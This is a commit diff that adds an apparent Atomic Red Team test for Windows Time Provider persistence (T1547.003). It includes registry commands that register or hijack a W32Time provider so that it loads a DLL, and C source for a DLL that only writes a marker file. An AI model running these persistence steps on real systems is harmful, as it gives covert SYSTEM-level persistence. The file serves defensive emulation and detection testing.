adding t1547.003 (#1996)

* adding t1547.003

* fixing cleanup commands

atomics/T1547.003/T1547.003.yaml

@@ -0,0 +1,52 @@
+attack_technique: T1547.003
+display_name: Time Providers
+atomic_tests:
+- name: Create a new time provider
+
+  description: |
+    Establishes persistence by creating a new time provider registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
+    The new time provider will point to a DLL which will be loaded after the w32time service is started. The DLL will then create the file AtomicTest.txt
+    in C:\Users\Public\ as validation that the test is successful.
+
+    Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.003/
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll
+      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
+      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "Enabled" /d "1" /f
+      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "InputProvider" /d "1" /f
+      net start w32time
+    cleanup_command: |
+      net stop w32time
+      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /f
+      rm -force C:\Users\Public\AtomicTest.dll
+    name: powershell
+    elevation_required: true
+
+- name: Edit an existing time provider
+
+  description: |
+    Establishes persistence by editing the NtpServer time provider registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
+    The time provider will point to a DLL which will be loaded after the w32time service is started. The DLL will then create the file AtomicTest.txt
+    in C:\Users\Public\ as validation that the test is successful.
+
+    Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.003/
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll
+      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
+      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "1" /f
+      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "InputProvider" /d "1" /f
+      net start w32time
+    cleanup_command: |
+      net stop w32time
+      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_SZ /v "DllName" /d "C:\Windows\SYSTEM32\w32time.DLL" /f
+      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "0" /f
+      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "InputProvider" /d "0" /f
+      rm -force C:\Users\Public\AtomicTest.dll
+    name: powershell
+    elevation_required: true

atomics/T1547.003/src/AtomicTest.c

@@ -0,0 +1,65 @@
+/*
+   Atomic Test T1547.003
+
+   Author:    traceflow
+              https://github.com/tr4cefl0w
+
+   Credits:   https://github.com/scottlundgren/w32time
+              https://pentestlab.blog/2019/10/22/persistence-time-providers/
+
+   Resources: https://docs.microsoft.com/en-us/windows/win32/sysinfo/creating-a-time-provider
+              https://docs.microsoft.com/en-us/windows/win32/sysinfo/sample-time-provider
+*/
+
+
+#include <windows.h>
+#include "timeprov.h"
+
+TimeProvSysCallbacks sc;
+const TimeProvHandle htp = (TimeProvHandle)1;
+TpcGetSamplesArgs Samples;
+DWORD dwPollInterval;
+
+void Run(void) {
+
+    CreateFile("c:\\users\\public\\AtomicTest.txt", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
+
+    return;
+
+}
+
+HRESULT CALLBACK TimeProvOpen(WCHAR *wszName, TimeProvSysCallbacks *pSysCallback, TimeProvHandle *phTimeProv) {
+
+	CreateThread(0, 0, (LPTHREAD_START_ROUTINE) Run, 0, 0, 0);
+
+	CopyMemory(&sc, (PVOID)pSysCallback, sizeof(TimeProvSysCallbacks));
+	*phTimeProv = htp;
+
+   return S_OK;
+}
+
+HRESULT CALLBACK TimeProvCommand(TimeProvHandle hTimeProv, TimeProvCmd eCmd, PVOID pvArgs) {
+   
+   switch( eCmd ) {
+      case TPC_GetSamples:
+      // Return the Samples structure in pvArgs.
+         CopyMemory(pvArgs, &Samples, sizeof(TpcGetSamplesArgs));
+         break;
+      case TPC_PollIntervalChanged:
+      // Retrieve the new value.
+         sc.pfnGetTimeSysInfo( TSI_PollInterval, &dwPollInterval );
+         break;
+      case TPC_TimeJumped:
+      // Discard samples saved in the Samples structure.
+         ZeroMemory(&Samples, sizeof(TpcGetSamplesArgs));
+         break;
+      case TPC_UpdateConfig:
+      // Read the configuration sirmation from the registry.
+         break;
+   }
+   return S_OK;
+}
+
+HRESULT CALLBACK TimeProvClose(TimeProvHandle hTimeProv) {
+   return S_OK;
+}

atomics/T1547.003/src/AtomicTest.def

@@ -0,0 +1,5 @@
+LIBRARY
+EXPORTS
+  TimeProvOpen
+  TimeProvCommand
+  TimeProvClose

atomics/T1547.003/src/build.bat

@@ -0,0 +1 @@
+cl.exe /W0 /D_USRDLL /D_WINDLL AtomicTest.c AtomicTest.def /MT /link /DLL /OUT:AtomicTest.dll